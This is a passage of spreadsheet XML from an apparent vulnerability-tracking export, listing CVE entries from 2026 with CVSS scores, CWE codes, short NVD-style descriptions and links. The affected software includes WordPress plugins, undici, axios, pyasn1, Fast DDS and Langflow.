      <c r="F2526" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2526" s="5" t="inlineStr"/>
      <c r="H2526" s="5" t="inlineStr"/>
      <c r="I2526" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2526" s="5" t="inlineStr"/>
      <c r="K2526" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2526" s="5" t="inlineStr">
        <is>
          <t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient validation of client-supplied state in RadImageEditor may allow an attacker to influence which file is returned by the control's image cache, potentially exposing file contents outside the intended image directories.</t>
        </is>
      </c>
      <c r="M2526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18672</t>
        </is>
      </c>
    </row>
    <row r="2527">
      <c r="A2527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18907</t>
        </is>
      </c>
      <c r="C2527" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2527" s="5" t="inlineStr"/>
      <c r="F2527" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2527" s="5" t="inlineStr"/>
      <c r="H2527" s="5" t="inlineStr"/>
      <c r="I2527" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2527" s="5" t="inlineStr"/>
      <c r="K2527" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2527" s="5" t="inlineStr">
        <is>
          <t>Path Traversal in Download File Feature in com.talpa.hibrowser 2.23.1.1 on Android allows arbitrary file write via directory traversal sequences in the filename.</t>
        </is>
      </c>
      <c r="M2527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18907</t>
        </is>
      </c>
    </row>
    <row r="2528">
      <c r="A2528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19080</t>
        </is>
      </c>
      <c r="C2528" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2528" s="5" t="inlineStr"/>
      <c r="F2528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2528" s="5" t="inlineStr"/>
      <c r="H2528" s="5" t="inlineStr"/>
      <c r="I2528" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2528" s="5" t="inlineStr"/>
      <c r="K2528" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L2528" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in Menulux Software Inc. Menulux Portal allows Account Footprinting.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="M2528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19080</t>
        </is>
      </c>
    </row>
    <row r="2529">
      <c r="A2529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19205</t>
        </is>
      </c>
      <c r="C2529" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2529" s="5" t="inlineStr"/>
      <c r="F2529" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2529" s="5" t="inlineStr"/>
      <c r="H2529" s="5" t="inlineStr"/>
      <c r="I2529" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2529" s="5" t="inlineStr"/>
      <c r="K2529" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L2529" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in GastroMenum GastroMenum Web Panel allows Account Footprinting.
This issue affects GastroMenum Web Panel: before 31.08.2026.</t>
        </is>
      </c>
      <c r="M2529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19205</t>
        </is>
      </c>
    </row>
    <row r="2530">
      <c r="A2530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19300</t>
        </is>
      </c>
      <c r="C2530" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2530" s="5" t="inlineStr"/>
      <c r="F2530" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2530" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2530" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2530" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2530" s="5" t="inlineStr"/>
      <c r="K2530" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2530" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to incomplete scrubbing of sensitive credential fields.</t>
        </is>
      </c>
      <c r="M2530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19300</t>
        </is>
      </c>
    </row>
    <row r="2531">
      <c r="A2531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19305</t>
        </is>
      </c>
      <c r="C2531" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2531" s="5" t="inlineStr"/>
      <c r="F2531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2531" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2531" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2531" s="5" t="inlineStr"/>
      <c r="K2531" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2531" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to server-side request forgery.</t>
        </is>
      </c>
      <c r="M2531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19305</t>
        </is>
      </c>
    </row>
    <row r="2532">
      <c r="A2532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19436</t>
        </is>
      </c>
      <c r="C2532" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2532" s="5" t="inlineStr"/>
      <c r="F2532" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2532" s="5" t="inlineStr"/>
      <c r="H2532" s="5" t="inlineStr"/>
      <c r="I2532" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2532" s="5" t="inlineStr"/>
      <c r="K2532" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2532" s="5" t="inlineStr">
        <is>
          <t>The Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 does not reconcile the value of the gift card coupon it issues against the amount actually collected at checkout, allowing unauthenticated users to obtain store credit worth more than they paid.</t>
        </is>
      </c>
      <c r="M2532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19436</t>
        </is>
      </c>
    </row>
    <row r="2533">
      <c r="A2533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19439</t>
        </is>
      </c>
      <c r="C2533" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2533" s="5" t="inlineStr"/>
      <c r="F2533" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2533" s="5" t="inlineStr"/>
      <c r="H2533" s="5" t="inlineStr"/>
      <c r="I2533" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2533" s="5" t="inlineStr"/>
      <c r="K2533" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2533" s="5" t="inlineStr">
        <is>
          <t>The Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 does not have any authorisation check when displaying gift card details, allowing unauthenticated users to retrieve the gift cards attached to arbitrary orders and disclose customer personal data, balances, dates and, in 3.2.9, the live redemption code, which anyone holding it can spend.
Versions from 3.0.3 to 3.2.8 disclose the same data without the redemption code.</t>
        </is>
      </c>
      <c r="M2533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19439</t>
        </is>
      </c>
    </row>
    <row r="2534">
      <c r="A2534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19534</t>
        </is>
      </c>
      <c r="C2534" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2534" s="5" t="inlineStr"/>
      <c r="F2534" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2534" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2534" s="5" t="inlineStr"/>
      <c r="I2534" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2534" s="5" t="inlineStr"/>
      <c r="K2534" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-252</t>
        </is>
      </c>
      <c r="L2534" s="5" t="inlineStr">
        <is>
          <t>undici's WebSocket client crashes the whole Node.js process during the opening handshake when a server responds with a subprotocol that the client never requested. A default WebSocket connection sends no subprotocol, but if the server's 101 response includes a Sec-WebSocket-Protocol header, undici dereferences a null value while checking it against the requested list and throws an uncaught TypeError. Because that code runs inside a microtask with no surrounding error handling, the exception propagates and terminates the process under Node's default behavior, instead of gracefully failing the connection as required by the WebSocket protocol. Any application that opens a WebSocket to an attacker-controlled or compromised server, or over a plaintext connection subject to a machine-in-the-middle, can be crashed remotely without authentication in the default configuration. This affects undici versions from 6.7.0 up to 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="M2534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19534</t>
        </is>
      </c>
    </row>
    <row r="2535">
      <c r="A2535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19654</t>
        </is>
      </c>
      <c r="C2535" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2535" s="5" t="inlineStr"/>
      <c r="F2535" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2535" s="5" t="inlineStr"/>
      <c r="H2535" s="5" t="inlineStr">
        <is>
          <t>redhat:enterprise_linux, rsyslog:rsyslog</t>
        </is>
      </c>
      <c r="I2535" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2535" s="5" t="inlineStr"/>
      <c r="K2535" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2535" s="5" t="inlineStr">
        <is>
          <t>A unauthenticated remote peer may lead rsyslogd to crash due to a flaw in the optional imptcp module. A crafted input sequence during oversize-frame recovery can cause an invalid internal message length and terminate rsyslogd. No confidentiality or integrity impact, privilege escalation, or code execution has been identified. imtcp and the default imptcp framing modes are not affected.</t>
        </is>
      </c>
      <c r="M2535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19654</t>
        </is>
      </c>
    </row>
    <row r="2536">
      <c r="A2536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19858</t>
        </is>
      </c>
      <c r="C2536" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2536" s="5" t="inlineStr"/>
      <c r="F2536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2536" s="5" t="inlineStr"/>
      <c r="H2536" s="5" t="inlineStr"/>
      <c r="I2536" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2536" s="5" t="inlineStr"/>
      <c r="K2536" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2536" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 does not perform authorisation checks when resolving request-derived data during page rendering, allowing unauthenticated users to read arbitrary user, post and term properties and metadata, including password hashes, private and draft content, and secrets other JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 store in metadata.</t>
        </is>
      </c>
      <c r="M2536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19858</t>
        </is>
      </c>
    </row>
    <row r="2537">
      <c r="A2537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21728</t>
        </is>
      </c>
      <c r="C2537" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2537" s="5" t="inlineStr"/>
      <c r="F2537" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2537" s="5" t="inlineStr"/>
      <c r="H2537" s="5" t="inlineStr">
        <is>
          <t>grafana:tempo</t>
        </is>
      </c>
      <c r="I2537" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J2537" s="5" t="inlineStr"/>
      <c r="K2537" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2537" s="5" t="inlineStr">
        <is>
          <t>Tempo queries with large limits can cause large memory allocations which can impact the availability of the service, depending on its deployment strategy.
Mitigation can be done by setting max_result_limit in the search config, e.g. to 262144 (2^18). Alternatively, automatically restart the service.</t>
        </is>
      </c>
      <c r="M2537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21728</t>
        </is>
      </c>
    </row>
    <row r="2538">
      <c r="A2538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22591</t>
        </is>
      </c>
      <c r="C2538" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2538" s="5" t="inlineStr"/>
      <c r="F2538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2538" s="5" t="inlineStr"/>
      <c r="H2538" s="5" t="inlineStr"/>
      <c r="I2538" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2538" s="5" t="inlineStr"/>
      <c r="K2538" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L2538" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3, Fast DDS’s implementation of SQL‑based content filtering (DDSSQLFilter) allows any participant in a DDS domain to remotely crash other Fast DDS participants by sending a single crafted SEDP `DATA` submessage whose `PID_CONTENT_FILTER_PROPERTY.filterExpression` contains a deeply nested filter expression. Versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3 fix the issue.</t>
        </is>
      </c>
      <c r="M2538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22591</t>
        </is>
      </c>
    </row>
    <row r="2539">
      <c r="A2539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23490</t>
        </is>
      </c>
      <c r="C2539" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2539" s="5" t="inlineStr"/>
      <c r="F2539" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2539" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2539" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, pyasn1:pyasn1</t>
        </is>
      </c>
      <c r="I2539" s="5" t="inlineStr">
        <is>
          <t>2026-01-16</t>
        </is>
      </c>
      <c r="J2539" s="5" t="inlineStr"/>
      <c r="K2539" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2539" s="5" t="inlineStr">
        <is>
          <t>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.</t>
        </is>
      </c>
      <c r="M2539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23490</t>
        </is>
      </c>
    </row>
    <row r="2540">
      <c r="A2540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24301</t>
        </is>
      </c>
      <c r="C2540" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2540" s="5" t="inlineStr"/>
      <c r="F2540" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G2540" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2540" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot</t>
        </is>
      </c>
      <c r="I2540" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2540" s="5" t="inlineStr"/>
      <c r="K2540" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2540" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24301</t>
        </is>
      </c>
    </row>
    <row r="2541">
      <c r="A2541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25639</t>
        </is>
      </c>
      <c r="C2541" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2541" s="5" t="inlineStr"/>
      <c r="F2541" s="5" t="n">
        <v>0.028</v>
      </c>
      <c r="G2541" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2541" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2541" s="5" t="inlineStr">
        <is>
          <t>2026-02-09</t>
        </is>
      </c>
      <c r="J2541" s="5" t="inlineStr"/>
      <c r="K2541" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-754</t>
        </is>
      </c>
      <c r="L2541" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.</t>
        </is>
      </c>
      <c r="M2541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25639</t>
        </is>
      </c>
    </row>
    <row r="2542">
      <c r="A2542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25679</t>
        </is>
      </c>
      <c r="C2542" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2542" s="5" t="inlineStr"/>
      <c r="F2542" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2542" s="5" t="inlineStr"/>
      <c r="H2542" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2542" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2542" s="5" t="inlineStr"/>
      <c r="K2542" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-425</t>
        </is>
      </c>
      <c r="L2542" s="5" t="inlineStr">
        <is>
          <t>url.Parse insufficiently validated the host/authority component and accepted some invalid URLs.</t>
        </is>
      </c>
      <c r="M2542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25679</t>
        </is>
      </c>
    </row>
    <row r="2543">
      <c r="A2543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26278</t>
        </is>
      </c>
      <c r="C2543" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2543" s="5" t="inlineStr"/>
      <c r="F2543" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2543" s="5" t="inlineStr"/>
      <c r="H2543" s="5" t="inlineStr">
        <is>
          <t>naturalintelligence:fast-xml-parser</t>
        </is>
      </c>
      <c r="I2543" s="5" t="inlineStr">
        <is>
          <t>2026-02-19</t>
        </is>
      </c>
      <c r="J2543" s="5" t="inlineStr"/>
      <c r="K2543" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L2543" s="5" t="inlineStr">
        <is>
          <t>fast-xml-p</t>
        </is>
      </c>
      <c r="M2543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26278</t>
        </is>
      </c>
    </row>
    <row r="2544">
      <c r="A2544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26456</t>
        </is>
      </c>
      <c r="C2544" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2544" s="5" t="inlineStr"/>
      <c r="F2544" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2544" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H2544" s="5" t="inlineStr"/>
      <c r="I2544" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2544" s="5" t="inlineStr"/>
      <c r="K2544" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-476</t>
        </is>
      </c>
      <c r="L2544" s="5" t="inlineStr">
        <is>
          <t>A null pointer dereference vulnerability exists in the server-side session management logic of ccoap 77f55c4b466e99327c24ace8a2913d3ba7e2ccd5. The issue is caused by a race condition between the request dispatch thread and the session cleanup thread when accessing shared session list nodes without proper synchronization.</t>
        </is>
      </c>
      <c r="M2544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26456</t>
        </is>
      </c>
    </row>
    <row r="2545">
      <c r="A2545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27137</t>
        </is>
      </c>
      <c r="C2545" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2545" s="5" t="inlineStr"/>
      <c r="F2545" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2545" s="5" t="inlineStr"/>
      <c r="H2545" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2545" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2545" s="5" t="inlineStr"/>
      <c r="K2545" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2545" s="5" t="inlineStr">
        <is>
          <t>When verifying a certificate chain which contains a certificate containing multiple email address constraints which share common local portions but different domain portions, these constraints will not be properly applied, and only the last constraint will be considered.</t>
        </is>
      </c>
      <c r="M2545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27137</t>
        </is>
      </c>
    </row>
    <row r="2546">
      <c r="A2546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27462</t>
        </is>
      </c>
      <c r="C2546" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2546" s="5" t="inlineStr"/>
      <c r="F2546" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2546" s="5" t="inlineStr"/>
      <c r="H2546" s="5" t="inlineStr"/>
      <c r="I2546" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2546" s="5" t="inlineStr"/>
      <c r="K2546" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L2546" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop returns different responses for valid/invalid usernames depending on multiple factors in the reset password mechanism, leading to user enumeration. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27462</t>
        </is>
      </c>
    </row>
    <row r="2547">
      <c r="A2547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27490</t>
        </is>
      </c>
      <c r="C2547" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2547" s="5" t="inlineStr"/>
      <c r="F2547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2547" s="5" t="inlineStr"/>
      <c r="H2547" s="5" t="inlineStr"/>
      <c r="I2547" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2547" s="5" t="inlineStr"/>
      <c r="K2547" s="5" t="inlineStr">
        <is>
          <t>CWE-330, CWE-331</t>
        </is>
      </c>
      <c r="L2547" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, inline images that are accessible without being authenticated are protected by a weak 24-bit pseudo-random secret. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27490</t>
        </is>
      </c>
    </row>
    <row r="2548">
      <c r="A2548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27889</t>
        </is>
      </c>
      <c r="C2548" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
